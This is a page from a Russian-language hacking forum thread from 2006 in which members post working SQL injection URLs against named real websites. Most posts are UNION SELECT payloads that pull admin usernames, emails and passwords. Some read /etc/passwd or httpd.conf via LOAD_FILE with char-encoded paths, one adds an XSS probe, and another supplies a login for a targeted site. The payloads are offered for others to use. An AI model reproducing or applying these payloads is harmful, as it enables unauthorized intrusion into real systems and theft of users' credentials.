HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 8 из 1602 « Первая < 4 5 6 7 8 9 10 11 12 18581085081008 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.10.2006, 21:36
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Цитата:
Сообщение от pop_korn  
какая то хрень с кавычками
_http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,tab le_name,null,null,null,null,null,null,null,null,nu ll+from+information_schema.tables--
http://www.galicianet.com/foros/default2.asp?IDMensaje=1 or 1=(select system_user) --
 
Ответить с цитированием

  #2  
Старый 07.10.2006, 16:40
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию
http://www.kazanova.com.ua/product.php?id=-296+UNION+SELECT+1,2,password,4,5,6,7,8,9,10,11,12 ,13,14+from+users/*
 
Ответить с цитированием

  #3  
Старый 08.10.2006, 17:16
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию
Вот еще одна, полноценная, пользуйтесь на здоровье
Цитата:
_http://www.hamptonplace.com/news/index.php?newsgroup=1%20and%201=2%20union%20select %201,email,3,4,5,6,7,concat(uname,char(58),passwd) ,9,10,11%20from%20admin/*
 
Ответить с цитированием

  #4  
Старый 09.10.2006, 04:06
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%20null,null,n ull,null,null,null,null,null,null,null,null,null,n ull%20/*
 
Ответить с цитированием

  #5  
Старый 09.10.2006, 04:09
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
http://binet.com.ua/dir/index.php?cat=-1'%20UNION%20SELECT%20null,null,null,null,null,nul l,null,null,null/*
 
Ответить с цитированием

  #6  
Старый 10.10.2006, 16:23
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию
Ну у меня не банк, конечно...но всё же...
Код:
_http://www.softinka.net/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
(Чтобы увидеть действие скуля, надо быть зарегенным на сайте. чтобы вам полдня не копаться с регистрацией: SponSor:hacker)
/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms _users%20where%20level=5
Последний раз редактировалось Dr.Check; 11.10.2006 в 09:33..
 
Ответить с цитированием

  #7  
Старый 11.10.2006, 22:44
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию
POST: http://shop.shooterscatalog.com/catalog.php?type=category&id=5125 order by 1/*

Скуль на шопе. ORDER BY не врет, но реализация не из элементарных.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #8  
Старый 13.10.2006, 08:29
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию
База в виде
email
loginassword


Цитата:
http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,email,3,4,5,6,7,concat(uname,char(58),passwd) ,9,10,11,12,13%20from%20admin/*


etc/passwd

Цитата:
http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,LOAD_FILE(char(47,101,116,99,47,112,97,115,11 5,119,100)),3,4,5,6,7,8,9,10,11,12,13%20from%20adm in/*


Также в окне поиска пассивная xss

<script>alert()</script>
 
Ответить с цитированием

  #9  
Старый 13.10.2006, 16:34
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию
Скуля в параметре типа STRING из-за недостаточной фильтрации входящих символов + magic_quotes=Off

http://www.president.bg/news_archive.php?from=news'%20and(1=1)--&type=0
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #10  
Старый 13.10.2006, 21:45
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию
Код:
http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92,119,119,119,92,99,111,110,102,92,104,116,116,112,100,46,99,111,110,102)),8,9,10/*
// показывает httpd.conf

_http://www.soccershop.ru/shopping/product_info.php?id=-3016+union+select+1,2,3/*
_http://www.mtas.ru/second.php?ID=-15+union+select+111/*
_http://www.transbuddha.com/mediaHolder.php?id=-1147+union+select+1,2,3,4,5,6,7/*
_http://www.ipecac.com/bio.php?id=-3+union+select+1,2,3,4/*
_http://www.rusfinclub.ru/index.php?news_id=-1846+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием
Ответ
Страница 8 из 1602 « Первая < 4 5 6 7 8 9 10 11 12 18581085081008 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ